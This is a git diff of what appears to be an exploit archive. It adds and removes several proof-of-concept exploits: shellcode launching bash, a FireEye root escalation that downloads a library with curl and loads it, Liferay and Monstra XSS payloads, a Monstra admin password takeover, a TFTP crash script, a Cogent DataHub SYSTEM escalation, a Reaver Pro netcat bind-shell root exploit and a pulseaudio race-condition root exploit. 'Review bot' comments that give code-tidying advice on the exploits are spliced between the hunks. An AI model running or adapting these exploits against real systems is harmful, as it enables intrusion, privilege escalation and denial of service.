+ 400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f
+ 40009e: 62 .byte 0x62
+ 40009f: 61 (bad)
+ 4000a0: 73 68 jae 0x40010a
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o bash_shell bash_shell.c
+$ execstack -s bash_shell
+$ ./bash_shell
+
+---------------------------------------------------------------------------------------------------
+*/
+#include
+char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) sh;
+ (int)(*func)();
+}
diff --git a/platforms/linux/local/39628.txt b/platforms/linux/local/39628.txt
new file mode 100755
index 000000000..616564ea0
--- /dev/null
+++ b/platforms/linux/local/39628.txt
@@ -0,0 +1,38 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670 + +The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group: + +$ ls -l /data/snort/config/snort.conf +-rw-rw-r-- 1 fenet contents 1332 Dec 2 18:02 /data/snort/config/snort.conf + +This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration. + +# mount | grep -v noexec | grep rw +... +/dev/sda8 on /var type ext4 (rw,noatime) +/dev/sda11 on /data type ext4 (rw,noatime) +/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0) +tmpfs on /dev/shm type tmpfs (rw) + +It looks like /dev/shm is a good candidate for storing a shared library. + +First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance: + +$ cat test.c +void __attribute__((constructor)) init(void) +{ + system("/usr/bin/id > /tmp/output.txt"); +} +$ gcc test.c -shared -s -fPIC -o test.so + +Now fetch that object on the FireEye machine, and instruct snort to load it: + +fireeye$ curl http://example.com/test.so > /dev/shm/test.so +fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf + +The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root: + +fireeye$ cat /tmp/output.txt +uid=0(admin) gid=0(root) groups=0(root) + +And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action. 
diff --git a/platforms/multiple/webapps/39626.txt b/platforms/multiple/webapps/39626.txt new file mode 100755 index 000000000..cd03ba18e --- /dev/null +++ b/platforms/multiple/webapps/39626.txt 
@@ -0,0 +1,43 @@ +#Exploit Title: Liferay Portal 5.1.2 - Persistent XSS +#Discovery Date: 2016-02-10 +#Exploit Author: Sarim Kiani +#Vendor Homepage: https://www.liferay.com +#Software Link: https://www.liferay.com/community/releases +#Version: 5.1.2 +#Tested on: Windows OS + +Liferay Portal 5.1.2 is an open source version of Liferay's enterprise web platform for building business solutions that deliver immediate results and long-term value. + +1. Vulnerability Description: + +A persistent XSS exists in "My Account" page of the application. + +2. Proof of Concept: + +Any user entering personal information in the "My Account" page of the application can insert XSS Payload in the Form. + +Test Payload: "> + +Parameter: _79_jobTitle +Parameter Name: Job Title + +POST /user/test/home?p_p_id=79&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user HTTP/1.1 +Host: localhost:8082 +Content-Length: 2712 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost:8082 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost:8082/user/test/home?p_p_id=79&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301 
+Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: LFR_SESSION_STATE_10127=1459071499499; COOKIE_SUPPORT=true; JSESSIONID=F53EC8D33C0D3ED9AD62FDA0BB682201; COMPANY_ID=10106; ID=7a31746f4f4c712f4179453d; PASSWORD=4e4c77485138744d61356f3d; LOGIN=74657374406c6966657261792e636f6d; SCREEN_NAME=4e4c77485138744d61356f3d; GUEST_LANGUAGE_ID=en_US +Connection: close + +_79_cmd=update&_79_tabs2=display&_79_tabs3=email-addresses&_79_tabs4=phone-numbers&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fedit_user%26_79_tabs2%3Ddisplay%26_79_tabs3%3Demail-addresses%26_79_tabs4%3Dphone-numbers%26_79_backURL%3Dhttp%253A%252F%252Flocalhost%253A8082%252Fuser%252Ftest%252Fhome%253Fp_p_id%253D79%2526p_p_lifecycle%253D0%2526p_p_state%253Dmaximized%2526p_p_mode%253Dview%2526_79_struts_action%253D%25252Fenterprise_admin%25252Fview%2526_79_tabs1%253Dusers%2526_79_tabs2%253D%2526_79_tabs3%253D%2526_79_keywords%253D%2526_79_advancedSearch%253Dfalse%2526_79_andOperator%253Dtrue%2526_79_firstName%253D%2526_79_middleName%253D%2526_79_lastName%253D%2526_79_screenName%253D%2526_79_emailAddress%253D%2526_79_active%253Dtrue%2526_79_organizationId%253D0%2526_79_roleId%253D0%2526_79_userGroupId%253D0%2526_79_cur%253D1%26_79_p_u_i_d%3D&_79_backURL=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301&_79_tabs1TabsScroll=&_79_screenName=user&_79_emailAddress=user%40xyz.com&_79_prefixId=&_79_
firstName=John&_79_middleName=&_79_lastName=Hopkins&_79_suffixId=&_79_birthdayMonth=0&_79_birthdayDay=1&_79_birthdayYear=1970&_79_male=1&_79_organizationIds=&_79_organizationNames=&_79_jobTitle=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&_79_tabs2TabsScroll=&_79_languageId=en_US&_79_timeZoneId=Pacific%2FMidway&_79_greeting=Welcome+John+Hopkins%21&_79_password1=&_79_password2=&_79_passwordReset=false&_79_tabs3TabsScroll=&_79_tabs4TabsScroll=&_79_openId=&_79_smsSn=&_79_aimSn=&_79_icqSn=&_79_jabberSn=&_79_msnSn=&_79_skypeSn=&_79_ymSn=&_79_facebookSn=&_79_mySpaceSn=&_79_twitterSn=&_79_announcementsTypegeneralEmail=false&_79_announcementsTypegeneralSms=false&_79_announcementsTypegeneralWebsite=true&_79_announcementsTypegeneralWebsiteCheckbox=on&_79_announcementsTypenewsEmail=false&_79_announcementsTypenewsSms=false&_79_announcementsTypenewsWebsite=true&_79_announcementsTypenewsWebsiteCheckbox=on&_79_announcementsTypetestEmail=false&_79_announcementsTypetestSms=false&_79_announcementsTypetestWebsite=true&_79_announcementsTypetestWebsiteCheckbox=on&_79_tabs1TabsScroll=&_79_comments= + +3. Solution: + +Issue has been resolved in newer versions. Upgrade to 6.1 CE or newer. \ No newline at end of file diff --git a/platforms/php/webapps/39567.txt b/platforms/php/webapps/39567.txt new file mode 100755 index 000000000..359b234e4 --- /dev/null +++ b/platforms/php/webapps/39567.txt 
@@ -0,0 +1,133 @@ +Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change +Google Dork: intext:"Powered by Monstra"/users/registration +Date: 2016-03-28 +Exploit Author: Sarim Kiani +Vendor Homepage: http://monstra.org +Software Link: http://monstra.org/download +Version: 3.0.3 +Tested on: Windows OS + +==================== TIMELINE ==================== +- Discovery Date: March 16 2016 +- Disclosed to Vendor: March 22 2016 +- Vendor Fixed the Issue: March 27 2016 +================================================== + +Bug Tracking ID: Github Issue # 405 +Link: https://github.com/monstra-cms/monstra/issues/405 + +Application Description: Monstra is a modern light weighted Content Management System written in php. + +1. Vulnerability Description: + +Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application. + +Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users: +http://localhost/monstra-3.0.3/users/1 + +The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found. + +Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'. + + +2. 
Proof of Concept/Code Flaw: + +`In file monstra\plugins\box\users\users.plugin.php + +Function: getProfileEdit + +Line No: 233 + + if (Users::$users->update(Request::post('user_id'), + array('login' => Security::safeName(Request::post('login')), + 'firstname' => Request::post('firstname'), + 'lastname' => Request::post('lastname'), + 'email' => Request::post('email'), + 'skype' => Request::post('skype'), + 'about_me' => Request::post('about_me'), + 'twitter' => Request::post('twitter')))) { + + // Change password + if (trim(Request::post('new_password')) != '') { + Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password'))))); + } + + Notification::set('success', __('Your changes have been saved.', 'users')); + Request::redirect(Site::url().'/users/'.$user['id']); + +On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality + +Users::$users->update --> updates the password` + +Header: + +> POST /monstra-3.0.3/users/8/edit HTTP/1.1 +Host: localhost +Content-Length: 152 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/monstra-3.0.3/users/8/edit +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B + +csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save + +3. Solution: + +Vendor has resolved the issue, use the patch 'User Security Fix # 406'. 
+ +Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5 + +################################################################################## + +#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS +#Google Dork: intext:"Powered by Monstra" +#Date: 2016-03-16 +#Exploit Author: Sarim Kiani +#Vendor Homepage: http://monstra.org +#Software Link: http://monstra.org/download +#Version: 3.0.3 +#Tested on: Windows OS + + +Monstra is a modern light weighted Content Management System written in php. + + +1. Description + +A Persistent XSS exists in the "Edit Profile" page of the application. + + +2. Proof of Concept + +Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form. + +Payload: "> + +The following entries on the page are vulnerable to a Persistent XSS payload: + +'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'. + +POST /monstra-3.0.3/users/8/edit HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/monstra-3.0.3/users/8/edit +Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 440 + 
+csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
+
+
+3.Solution
+
+No newer (fixed) versions are currently available.
diff --git a/platforms/windows/dos/39627.py b/platforms/windows/dos/39627.py
new file mode 100755
index 000000000..5c70ecb3c
--- /dev/null
+++ b/platforms/windows/dos/39627.py
@@ -0,0 +1,24 @@
+# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
+# Date: 28-03-2016
+# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
+# Exploit Author: Charley Celice (stmerry)
+# Contact: https://twitter.com/charleycelice
+#
+# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
+# * https://www.exploit-db.com/exploits/26010/
+#
+# Category: Denial of Service
+# Tested on: Windows XP SP3 English
+# Details: Remotely crash TallSoft SNMP TFTP Server
+
+from socket import *
+import sys, select
+
+address = ('127.0.0.1', 69)
+
+# sufficient for the crash to work
+crash = "\x00\x02\x00"
+crash += "\x41"*1019
+
+server_socket = socket(AF_INET, SOCK_DGRAM)
+server_socket.sendto(crash, address)
\ No newline at end of file
diff --git a/platforms/windows/local/37898.py b/platforms/windows/local/37898.py
deleted file mode 100755
index 4c1797a70..000000000
--- a/platforms/windows/local/37898.py
+++ /dev/null
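Review bot: `import sys, select` is unused and `from socket import *` pulls the whole module namespace in for two names; `import socket` with `socket.socket(socket.AF_INET, socket.SOCK_DGRAM)` would make the dependencies explicit. The header block states a test platform but not an interpreter version, and the payload is built as a `str`, so the script appears to be Python 2-only; a `# Python 2` line in the header would tell a reader that before they hit a type error. The socket is never closed and the name `server_socket` describes a client-side socket; `server_socket.close()` after the send, or opening it in a `with` block, would keep the script tidy.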
@@ -1,23 +0,0 @@
-source: http://www.securityfocus.com/bid/55725/info
-
-Reaver Pro is prone to a local privilege-escalation vulnerability.
-
-A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers.
-
-#!/usr/bin/env python
-import os
-print """
- Reaver Pro Local Root
- Exploits a hilarious named pipe flaw.
-The named pipe /tmp/exe is open to anyone...
-Any command echoed into it gets ran as root.
-This simply launches a bindshell on 4444...
- Insecurety Research | insecurety.net
-"""
-print ""
-print "This is why TacNetSol should hire me?"
-print "[+] Sending command to named pipe..."
-cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
-os.system(cmd)
-print "[+] Connecting to bind shell, enjoy root!"
-os.system("nc -v localhost 4444")
diff --git a/platforms/windows/local/39630.g b/platforms/windows/local/39630.g
new file mode 100755
index 000000000..ed6ece3f6
--- /dev/null
+++ b/platforms/windows/local/39630.g
@@ -0,0 +1,65 @@
+/*
+
+# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
+# Google Dork: lol
+# Date: 28/3/2016
+# Exploit Author: mr_me
+# Vendor Homepage: http://www.cogentdatahub.com/
+# Software Link: http://www.cogentdatahub.com/Contact_Form.html
+# Version: <= 7.3.9
+# Tested on: Windows 7 x86
+# CVE : CVE‑2016-2288
+
+sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
+Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
+
+Timeline:
+=========
+- 02/12/2015 : vuln found, case opened to the zdi
+- 09/02/2016 : case rejected (not interested in this vuln due to vector)
+- 26/02/2016 : reported to ICS-CERT
+- 24/03/2016 : advisory released
+
+Notes:
+======
+- to reach SYSTEM, the service needs to be installed via the Service Manager
+- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
+- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
+
+Exploitation:
+=============
+
+As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
+a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
+
+C:\Users\steven>sc qc "Cogent DataHub"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Cogent DataHub
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Cogent DataHub
+ DEPENDENCIES : RPCSS
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\steven>
+*/
+
+require ("Application");
+require ("AsyncRun"); // thanks to our friends @ Cogent
+
+class WebstreamSupport Application
+{
+
+}
+
+method WebstreamSupport.constructor ()
+{
+ RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
+}
+
+Webstream = ApplicationSingleton (WebstreamSupport);
diff --git a/platforms/windows/local/9207.sh b/platforms/windows/local/9207.sh
deleted file mode 100755
index 31847aec0..000000000
--- a/platforms/windows/local/9207.sh
+++ /dev/null
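Review bot: The CVE identifier in the 39630.g header comment, `# CVE : CVE‑2016-2288`, appears to use a non-ASCII hyphen after `CVE` rather than the plain `-` used in the rest of the id, so tooling that greps or indexes advisories by CVE id will not match this file; rewrite it as `# CVE : CVE-2016-2288` with ASCII hyphens only. The same header block has `Advsiory:` where `Advisory:` is meant. Further down, the `class WebstreamSupport Application { }` body is empty; if, as the Notes section suggests, the class exists only so that the constructor runs when the DataHub picks up the file, a one-line comment inside the braces saying so would spare the next reader the inference.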
@@ -1,183 +0,0 @@
-#!/bin/bash
-
-pulseaudio=`which pulseaudio`
-workdir="/tmp"
-#workdir=$HOME
-id=`which id`
-shell=`which sh`
-
-trap cleanup INT
-
-function cleanup()
-{
- rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
- rm -rf $workdir/PATMP*
-}
-
-cat > $workdir/pa_race.c << __EOF__
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define PULSEAUDIO_PATH "$pulseaudio"
-#define SH_PATH "$workdir/sh"
-#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
-
-void _pause(long sec, long usec);
-
-int main(int argc, char *argv[], char *envp[])
-{
- int status;
- pid_t pid;
- char template[sizeof(TMPDIR_TEMPLATE)];
- char *tmpdir;
- char hardlink[sizeof(template) + 2];
- char hardlink2[sizeof(template) + 12];
-
- srand(time(NULL));
-
- for( ; ; )
- {
- snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
- template[sizeof(template) - 1] = '\0';
-
- tmpdir = mkdtemp(template);
- if(tmpdir == NULL)
- {
- perror("mkdtemp");
- return 1;
- }
-
- snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
- hardlink[sizeof(hardlink) - 1] = '\0';
-
- snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
- hardlink2[sizeof(hardlink2) - 1] = '\0';
-
- /* this fails if $workdir is a different partition */
- if(link(PULSEAUDIO_PATH, hardlink) == -1)
- {
- perror("link");
- return 1;
- }
-
- if(link(SH_PATH, hardlink2) == -1)
- {
- perror("link");
- return 1;
- }
-
- pid = fork();
-
- if(pid == 0)
- {
- char *argv[] = {hardlink, NULL};
- char *envp[] = {NULL};
-
- execve(hardlink, argv, envp);
-
- perror("execve");
- return 1;
- }
-
- if(pid == -1)
- {
- perror("fork");
- return 1;
- }
- else
- {
- /* tweak this if exploit does not work */
- _pause(0, rand() % 500);
-
- if(unlink(hardlink) == -1)
- {
- perror("unlink");
- return 1;
- }
-
- if(link(SH_PATH, hardlink) == -1)
- {
- perror("link");
- return 1;
- }
- waitpid(pid, &status, 0);
- }
-
- if(unlink(hardlink) == -1)
- {
- perror("unlink");
- return 1;
- }
-
- if(unlink(hardlink2) 
== -1)
- {
- perror("unlink");
- return 1;
- }
-
- if(rmdir(tmpdir) == -1)
- {
- perror("rmdir");
- return 1;
- }
- }
-
- return 0;
-}
-
-void _pause(long sec, long usec)
-{
- struct timeval timeout;
-
- timeout.tv_sec = sec;
- timeout.tv_usec = usec;
-
- if(select(0, NULL, NULL, NULL, &timeout) == -1)
- {
- perror("select");
- }
-}
-__EOF__
-
-cat > $workdir/sh.c << __EOF__
-#include
-#include
-#include
-#include
-
-
-int main(int argc, char *argv[], char *envp[])
-{
- if(geteuid() != 0)
- {
- return 1;
- }
-
- setuid(0);
- setgid(0);
-
- if(fork() == 0)
- {
- argv[0] = "$id";
- argv[1] = NULL;
- execve(argv[0], argv, envp);
- return 1;
- }
-
- argv[0] = "$shell";
- argv[1] = NULL;
- execve(argv[0], argv, envp);
- return 1;
-}
-__EOF__
-
-gcc -o $workdir/pa_race $workdir/pa_race.c
-gcc -o $workdir/sh $workdir/sh.c
-
-$workdir/pa_race
-
-# milw0rm.com [2009-07-20]